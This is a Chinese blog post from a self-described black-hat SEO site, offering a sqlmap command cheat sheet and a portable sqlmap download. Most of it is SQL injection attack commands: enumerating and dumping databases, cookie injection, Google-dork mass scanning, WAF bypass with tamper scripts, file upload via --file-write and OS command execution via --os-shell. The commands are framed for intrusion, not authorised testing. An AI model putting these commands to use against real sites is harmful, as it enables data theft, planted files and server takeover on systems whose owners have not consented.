淄博seo培训:sqlmap命令大全_SqlMap免Python环境绿色版下载

作者: 黑帽SEO少校 分类: 渗透劫持 发布时间: 2019-01-25 20:05:34

sqlmap是一个开源的渗透测试工具,利用数据库注入漏洞获取网站的信息和相应的权限。世界上最牛逼的黑客都在用这款小巧精悍的渗透利器。下面整理出来sqlmap的命令大全分析给大家,文章结尾附上SqlMap免Python环境的下载。

access数据库注入

sqlmap.py -u ""
sqlmap.py -u "" --tables    参数:列表名
sqlmap.py -u "" --columns -T ""        参数:列字段
sqlmap.py -u "" --dump -C "" -T ""    参数:下载数据

MySQL数据库注入

sqlmap.py -u ""
sqlmap.py -u "" --is-dba	当前用户权限
sqlmap.py -u "" --dbs		所有数据库
sqlmap.py -u "" --current-db	网站当前数据库
sqlmap.py -u "" --users	所有数据库用户
sqlmap.py -u "" --current-user	当前数据库用户
sqlmap.py -u "" --tables -D ""
sqlmap.py -u "" --columns -T "" -D ""
sqlmap.py -u "" --dump -C "" -T "" -D ""

MsSQL数据库注入

sqlmap.py -u ""
sqlmap.py -u "" --is-dba    当前用户权限
sqlmap.py -u "" --dbs        所有数据库
sqlmap.py -u "" --users    所有数据库用户
sqlmap.py -u "" --current-db    网站当前数据库
sqlmap.py -u "" --current-user    当前数据库用户
sqlmap.py -u "" --tables -D ""
sqlmap.py -u "" --columns -T "" -D ""
sqlmap.py -u "" --dump -C "" -T "" -D ""(sqlmap.py -u "" --dump -T "" -D "")

Cookie中转注入

sqlmap.py -u ""
sqlmap.py -u "" --cookie "id=?" --level ?
sqlmap.py -u "" --cookie "id=?" --level ? --tables
sqlmap.py -u "" --cookie "id=?" --level ? --columns -T ""
sqlmap.py -u "" --cookie "id=?" --level ? --dump -C "" -T ""

利用google批量搜索注入

sqlmap.py -g ""	谷歌关键字搜索
搜索引擎语法:
inurl:
intext:	
intitle:	
site:

tamper插件使用

sqlmap.py -u ""
sqlmap.py -u "" -v 3 --batch -- tamper ""  
sqlmap.py -u "" --check-waf --tamper ""

file参数使用(必须是dba)

sqlmap.py -u "" 
sqlmap.py -u "" --is-dba  	当前用户权限
sqlmap.py -u "" --file-write=D:/需上传的文件名 --file-dest=硬盘:/文件夹/.../需上传的文件列名

post提交方式注入

sqlmap.py -u "" --forms
sqlmap.py -r "" 文本文档名

OS参数

sqlmap.py -u "" --os-cmd= (推荐win)
sqlmap.py -u "" --os-shell	(exit)

SqlMap免Python环境绿色版下载:《点击下载

本文由黑帽seo原创发布,转载请注明出处: https://www.0116.net/stjc/70/

发表评论

电子邮件地址不会被公开。

更多阅读